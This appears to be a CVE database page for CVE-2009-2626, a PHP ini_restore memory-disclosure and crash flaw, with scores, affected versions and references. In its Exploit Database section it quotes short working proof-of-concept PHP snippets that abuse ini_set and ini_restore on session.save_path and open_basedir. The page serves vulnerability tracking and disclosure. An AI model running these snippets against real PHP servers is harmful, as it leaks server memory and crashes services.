CVE-2009-2626 : Detail

CVE-2009-2626

1%V3
Network
2009-12-01
16h00 +00:00
2024-09-16
23h56 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The zend_restore_ini_entry_cb function in zend_ini.c in PHP 5.3.0, 5.2.10, and earlier versions allows context-specific attackers to obtain sensitive information (memory contents) and cause a PHP crash by using the ini_set function to declare a variable, then using the ini_restore function to restore the variable.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.4 AV:N/AC:L/Au:N/C:P/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 10296

Publication date : 2009-12-02
23h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : Yes

Credit/Author: Maksymilian Arciemowicz from SecurityReason Vulnerable: PHP PHP 5.3 PHP PHP 5.2.10 Debian Linux 5.0 sparc Debian Linux 5.0 s/390 Debian Linux 5.0 powerpc Debian Linux 5.0 mipsel Debian Linux 5.0 mips Debian Linux 5.0 m68k Debian Linux 5.0 ia-64 Debian Linux 5.0 ia-32 Debian Linux 5.0 hppa Debian Linux 5.0 armel Debian Linux 5.0 arm Debian Linux 5.0 amd64 Debian Linux 5.0 alpha Debian Linux 5.0 References: https://www.securityfocus.com/bid/36009/info http://securityreason.com/achievement_securityalert/65 Description: PHP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks POC 1: <?php ini_set("session.save_path", "0123456789ABCDEF"); ini_restore("session.save_path"); session_start(); ?> POC 2: <?php ini_set("open_basedir", "A"); ini_restore("open_basedir"); ini_get("open_basedir"); include("B"); ?>
Exploit Database EDB-ID : 33162

Publication date : 2009-08-09
22h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : Yes

source: https://www.securityfocus.com/bid/36009/info PHP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. <?php ini_set("session.save_path", "0123456789ABCDEF"); ini_restore("session.save_path"); session_start(); ?>
Exploit Database EDB-ID : 33163

Publication date : 2009-08-09
22h00 +00:00
Author : Maksymilian Arciemowicz
EDB Verified : Yes

source: https://www.securityfocus.com/bid/36009/info PHP is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. <?php ini_set("open_basedir", "A"); ini_restore("open_basedir"); ini_get("open_basedir"); include("B"); ?>

Products Mentioned

Configuraton 0

Php>>Php >> Version To (including) 5.2.10

Php>>Php >> Version 1.0

Php>>Php >> Version 2.0

Php>>Php >> Version 2.0b10

Php>>Php >> Version 3.0

Php>>Php >> Version 3.0.1

Php>>Php >> Version 3.0.2

Php>>Php >> Version 3.0.3

Php>>Php >> Version 3.0.4

Php>>Php >> Version 3.0.5

Php>>Php >> Version 3.0.6

Php>>Php >> Version 3.0.7

Php>>Php >> Version 3.0.8

Php>>Php >> Version 3.0.9

Php>>Php >> Version 3.0.10

Php>>Php >> Version 3.0.11

Php>>Php >> Version 3.0.12

Php>>Php >> Version 3.0.13

Php>>Php >> Version 3.0.14

Php>>Php >> Version 3.0.15

Php>>Php >> Version 3.0.16

Php>>Php >> Version 3.0.17

Php>>Php >> Version 3.0.18

Php>>Php >> Version 4

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0

    Php>>Php >> Version 4.0.0

    Php>>Php >> Version 4.0.1

    Php>>Php >> Version 4.0.1

    Php>>Php >> Version 4.0.1

    Php>>Php >> Version 4.0.2

    Php>>Php >> Version 4.0.3

    Php>>Php >> Version 4.0.3

    Php>>Php >> Version 4.0.4

    Php>>Php >> Version 4.0.4

      Php>>Php >> Version 4.0.5

      Php>>Php >> Version 4.0.6

      Php>>Php >> Version 4.0.7

      Php>>Php >> Version 4.0.7

      Php>>Php >> Version 4.0.7

      Php>>Php >> Version 4.0.7

      Php>>Php >> Version 4.0.7

        Php>>Php >> Version 4.1.0

        Php>>Php >> Version 4.1.1

        Php>>Php >> Version 4.1.2

        Php>>Php >> Version 4.2

          Php>>Php >> Version 4.2.0

          Php>>Php >> Version 4.2.1

          Php>>Php >> Version 4.2.2

          Php>>Php >> Version 4.2.3

          Php>>Php >> Version 4.3.0

          Php>>Php >> Version 4.3.1

          Php>>Php >> Version 4.3.2

          Php>>Php >> Version 4.3.3

          Php>>Php >> Version 4.3.4

          Php>>Php >> Version 4.3.5

          Php>>Php >> Version 4.3.6

          Php>>Php >> Version 4.3.7

          Php>>Php >> Version 4.3.8

          Php>>Php >> Version 4.3.9

          Php>>Php >> Version 4.3.10

          Php>>Php >> Version 4.3.11

          Php>>Php >> Version 4.4.0

          Php>>Php >> Version 4.4.1

          Php>>Php >> Version 4.4.2

          Php>>Php >> Version 4.4.3

          Php>>Php >> Version 4.4.4

          Php>>Php >> Version 4.4.5

          Php>>Php >> Version 4.4.6

          Php>>Php >> Version 4.4.7

          Php>>Php >> Version 4.4.8

          Php>>Php >> Version 4.4.9

          Php>>Php >> Version 5

            Php>>Php >> Version 5.0

              Php>>Php >> Version 5.0

                Php>>Php >> Version 5.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.0

                  Php>>Php >> Version 5.0.1

                  Php>>Php >> Version 5.0.2

                  Php>>Php >> Version 5.0.3

                  Php>>Php >> Version 5.0.4

                  Php>>Php >> Version 5.0.5

                  Php>>Php >> Version 5.1.0

                  Php>>Php >> Version 5.1.1

                  Php>>Php >> Version 5.1.2

                  Php>>Php >> Version 5.1.3

                  Php>>Php >> Version 5.1.4

                  Php>>Php >> Version 5.1.5

                  Php>>Php >> Version 5.1.6

                  Php>>Php >> Version 5.2.0

                  Php>>Php >> Version 5.2.2

                  Php>>Php >> Version 5.2.4

                  Php>>Php >> Version 5.2.6

                  Php>>Php >> Version 5.2.7

                  Php>>Php >> Version 5.2.8

                  Php>>Php >> Version 5.2.9

                  Php>>Php >> Version 5.3.0

                  References

                  http://secunia.com/advisories/37482
                  Tags : third-party-advisory, x_refsource_SECUNIA
                  http://www.debian.org/security/2009/dsa-1940
                  Tags : vendor-advisory, x_refsource_DEBIAN
                  http://www.securityfocus.com/bid/36009
                  Tags : vdb-entry, x_refsource_BID
                  http://securityreason.com/achievement_securityalert/65
                  Tags : third-party-advisory, x_refsource_SREASONRES